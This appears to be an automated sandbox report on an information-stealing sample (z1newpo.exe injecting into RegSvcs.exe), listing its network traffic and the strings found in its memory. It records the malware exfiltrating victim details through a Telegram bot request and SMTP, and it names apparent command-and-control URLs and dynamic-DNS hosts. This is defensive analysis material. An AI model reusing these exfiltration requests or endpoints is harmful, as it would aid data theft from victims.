                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49723 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.7:49732 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Sep 2024 13:26:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Sep 2024 13:26:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000027B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.000000000273F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: name.exe, 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.000000000267F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002629000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.000000000266F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3688609885.0000000002694000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002716000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000026AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3691769628.0000000003653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 00000003.00000002.3691195829.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegSvcs.exe, 0000000D.00000002.3689181352.00000000027E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.0000000002771000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
